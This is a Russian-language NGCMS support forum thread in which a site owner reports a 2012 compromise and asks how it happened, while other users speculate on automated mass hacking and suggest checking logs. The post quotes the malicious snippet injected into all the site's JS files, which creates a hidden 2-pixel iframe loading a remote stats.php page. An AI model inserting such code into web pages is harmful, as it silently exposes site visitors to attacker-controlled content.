Вы не вошли.
Страницы 1
Тема закрыта
Всем привет. Столкнулся с проблемой, был взломан сайт 19.11.2012
Были модифицированы все js файлы путём добавления кода следующего содержания:
/*0fead1*/
(function()
{
var a = document.createElement('iframe');
a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php';
a.style.position = 'absolute';
a.style.border = '0';
a.style.height = '2px';
a.style.width = '2px';
a.style.left = '1px';
a.style.top = '1px';
if(!document.getElementById('mira'))
{
document.write('<div id=\'mira\'></div>');
document.getElementById('mira').appendChild(a);
}
})();
/*/0fead1*/Не могу понять как такое произошло. Я бы мог погрешить на то, что спалил пароль от хостинга, но тогда было бы логично что заразили бы все поддомены мои тестовые, а заразили только один, значит не спалили пароль. Взломали только тот поддомен, где стояла ngcms 0.9.3 + SVN [SVN1047+] Ещё более нелогичным можно посчитать тот факт, что взломали выключенный к показу посетителям сайт, то есть из админки я выключил его, правда не помню когда, до взлома или уже после... Как это можно проверить?
Напрашивается вывод что есть какая то уязвимость в самом движке. Встречался кто с подобной проблемой и как лечить? Сайт: o.nushaba.ru
Вне форума
Nushaba, судя по коду что тут стоит эти хакеры ломанули 9620 сайтов на НГ столько нету
Все сайты, что могут быть сделаны на ng cms, должны быть сделаны на ng cms.
Расширив границы сознания, мы открываем новые горизонты жизни.
Вне форума
easmik, очевидно ломали скриптом, или каким то софтом который автоматизировал процесс, иначе зачем ещё ломать сайт который выключен. Но всё же остаются вопросы, почему взломали именно сайт с ngcms внутри а не все остальные на хостинге, ну или вопрос как это сделали, тогда будет понятно что то. В общем думаю есть дыра в движке, так как аналогичный взлом был около года назад, тогда я не стал писать.
Вне форума
Логи то смотрели?
https://www.google.ru/search?client=ope … el=suggest
Отредактировано infinity237 (2012-12-24 17:57:02)
Вне форума
Ну и как ты теперь хочешь чтобы мы тебе сказали где бага? :D
Вне форума
Albert, http://ngcms.ru/forum/viewtopic.php?pid=35992#p35992
Вне форума
Страницы 1
Тема закрыта
[ Сгенерировано за 0.013 сек, 7 запросов выполнено - Использовано памяти: 542.27 Кбайт (Пик: 563.27 Кбайт) ]